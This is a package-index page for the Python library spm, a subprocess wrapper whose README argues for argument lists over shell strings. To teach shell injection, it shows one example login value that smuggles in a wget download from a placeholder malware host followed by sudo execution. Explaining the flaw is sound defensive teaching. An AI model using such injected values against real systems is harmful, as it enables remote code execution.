spm

Release 0.9.1

SubProcess Manager provides a simple programming interface to safely run, pipe and redirect output of subprocesses.

Homepage PyPI Python

Keywords
api, exec, execute, fork, output, pipe, process, processes, redirect, safe, sh, shell, subprocess
License
MIT
Install
pip install spm==0.9.1

Documentation

spm (SubProcessesManager)

https://travis-ci.org/acatton/python-spm.svg?branch=master 
>>> import spm
>>> spm.run('echo', '-n', 'hello world').stdout.read()
'hello world'
>>> import functools
>>> git = functools.partial(spm.run, 'git')
>>> git('status', '-z').stdout.read().split(b'\x00')
[' M spm.py', '']

This provides a very thin KISS layer on top of the python standard library's subprocess module. This library supports Python 2 and Python 3.

This makes it easy to pipe subprocesses, and pipe subprocesses input/output to files.

It only has four rules:

  • Simple programming interface
  • Don't reimplement the wheel. (It tries uses the subprocess standard module as much as possible)
  • It only does one thing, and try to do it well.
  • Use argument list instead of one command string.

Secure subprocess invocation

For those who don't understand the last rule. There are two ways to ways to invoke subprocesses in python: One method is insecure, the other one is secure.

import subprocess

# Insecure subprocess invocation
subprocess.check_call("echo foo", shell=True)
# Secure subprocess invocation
subprocess.check_call(['echo', 'foo'])

The second one is secure, because it prevents shell code injection. If we over simplify, the first method, could be implemented this way:

def insecure_check_call(command_line):
    """
    Same as check_call(shell=True)
    """
    # Runs /bin/bash -c "the given command line"
    subprocess.check_call(['/bin/bash', '-c', command_line])

Let's use the following code as example:

import subprocess
# Get insecure and unchecked data from a user
from somewhere import get_login_from_user()

def create_user():
    cmd = "sudo useradd '{}'".format(get_login_from_user())
    subprocess.check_call(cmd)

A user can inject code if they enter the login ' || wget http://malware.example.com/malware -O /tmp && sudo /tmp/malware. Because this will execute: sudo user '' || wget [...] -O /tmp && sudo /tmp/malware.

Why another library?

XKCD Comic strip: "How Standards Profilef

Here are the existing libraries:

  • sh: doing too much. The programming interface for piping commands is complex and bad.
  • execute: old, vulnerable to shell injection.
  • sarge: doing too much, vulnerable to shell injection.
  • envoy: too complicated, and vulnerable to shell injection.

And many other are unmaintained or worse.

What do you mean by KISS?

KISS lost its original sense. Now it's just an hipster word which means "just use my library because it's cool".

Here I mean KISS in its original sense: Keep It Simple, Stupid.

  • this library is one file with less than 500 lines (excluding testing)
  • this library has two functions: pipe() and run()

Stats

Dependencies
0
Dependent packages
0
Dependent repositories
2
Total releases
4
Latest release
First release
Stars
5
Forks
2
Watchers
3
Contributors
2
Repository size
260 KB
SourceRank
9

Development practices

Source repo 2FA enabled
TEXT!
Package manager 2FA enabled
TEXT!
Is security responsive
TEXT!
Dependencies are managed
TEXT!
Issue-free release available
TEXT!
Succession plan available
TEXT!
Package manager 2FA enabled
TEXT!

The Tidelift Subscription provides access to a continuously curated stream of human-researched and maintainer-verified data on open source packages and their licenses, releases, vulnerabilities, and development practices.

Learn more

Releases

0.9.1
0.9.0
1.0.1
1.0.0

Contributors

Antoine Catton David Sanders


See all contributors

Something wrong with this page? Make a suggestion

Export .ABOUT file for this package

Last synced: 2022-01-05 07:36:37 UTC

Login to resync this project